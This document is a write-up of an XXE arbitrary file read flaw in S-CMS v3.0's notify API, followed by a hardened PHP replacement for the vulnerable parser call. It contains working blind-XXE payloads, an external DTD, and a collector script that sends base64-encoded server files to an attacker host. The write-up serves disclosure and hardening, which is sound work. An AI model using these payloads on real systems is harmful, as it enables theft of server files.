S-CMS v3.0 XXE Arbitrary File Read Vulnerability

Vulnerable environment: PHP 5.3 / 5.4

The vulnerability is located in /api/notify.php; the key code is as follows:

simplexml_load_string parses the XML body passed in via POST directly and does nothing to prevent entity loading, so entity declarations in attacker-supplied XML are honoured.

Note:

In older PHP versions simplexml_load_string expands entities by default. In newer versions entities are no longer expanded by default; they are only expanded if the third parameter LIBXML_NOENT is passed explicitly, e.g. simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT).

Checking whether internal entities are expanded

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY test "this is test">
]>
<root>&test;</root>
```

Checking whether external entities are supported

```xml
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://192.168.211.129:7777">
]>
<r>&sp;</r>
```

Create a new evil.xml on the attacker-controlled server so that it can be loaded remotely as an external DTD:

```xml
<!ENTITY % payload "<!ENTITY &#x25; send SYSTEM 'http://192.168.211.129/xxe.php?file=%file;'>"> %payload;
```

xxe.php, on the same server, records the contents of the file that was read:

```php
<?php
// Append the value of the "file" query parameter (the exfiltrated,
// base64-encoded file contents) to 1.log, one entry per line.
file_put_contents("1.log", $_GET['file'] . "\n", FILE_APPEND);
?>
```

Blind XXE arbitrary file read

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://192.168.211.129/evil.xml">
%dtd;
%send;
]>
<root></root>
```

Send the request; the attacker's server then writes a 1.log file containing the base64-encoded contents of the target file, confirming the arbitrary file read.
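As an added example (not S-CMS code, and not part of the original writeup), the following is a hardened replacement for the simplexml_load_string call described in the note above. It is written to reject every payload shown on this page, from the inline-entity probe to the blind external-DTD document, while still parsing a plain notify body. The function name parse_untrusted_xml and the sample inputs are assumptions constructed for this example.

```php
<?php
// Added example, not code from S-CMS: parse untrusted XML (such as the body
// of /api/notify.php) without expanding entities or touching the network.

declare(strict_types=1);

/**
 * Parse an untrusted XML string safely.
 * Returns a SimpleXMLElement on success, or null if the document carries a
 * DTD / entity declaration or fails to parse.
 */
function parse_untrusted_xml(string $xml): ?SimpleXMLElement
{
    // 1. Reject any document that declares a DTD or an entity at all.
    //    A payment/notify callback has no legitimate reason to carry one,
    //    and every XXE payload on this page needs one. Log the rejection so
    //    probing attempts are visible in the application log.
    if (preg_match('/<!(DOCTYPE|ENTITY)\b/i', $xml)) {
        error_log('Rejected XML containing a DTD from '
            . ($_SERVER['REMOTE_ADDR'] ?? 'cli'));
        return null;
    }

    // 2. On PHP < 8.0 external entity loading may still be on by default for
    //    this process; switch it off. (Deprecated in 8.0, where the default is
    //    already safe, hence the version guard.)
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }

    // 3. Do NOT pass LIBXML_NOENT (that is what enables entity substitution);
    //    pass LIBXML_NONET so a SYSTEM identifier is never fetched even if the
    //    pre-check above is bypassed somehow.
    $prev = libxml_use_internal_errors(true);
    $doc  = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    return $doc === false ? null : $doc;
}

// Constructed sample inputs for a quick self-check: a benign notify body and
// the inline-entity probe from the writeup above.
$benign = '<?xml version="1.0"?><root><order_id>42</order_id></root>';
$probe  = '<?xml version="1.0" encoding="UTF-8"?>'
        . '<!DOCTYPE ANY [<!ENTITY test "this is test">]>'
        . '<root>&test;</root>';

$ok       = parse_untrusted_xml($benign);   // SimpleXMLElement
$rejected = parse_untrusted_xml($probe);    // null, and a line in the error log

var_dump($ok instanceof SimpleXMLElement, $rejected);
```

The DTD pre-check is deliberately blunt: it also refuses documents that merely reference an external DTD without declaring entities, which is acceptable for an API endpoint that expects a fixed schema. The part that actually closes the hole is step 3, omitting LIBXML_NOENT and adding LIBXML_NONET, so even a parser invoked elsewhere in the code base should be audited for that option.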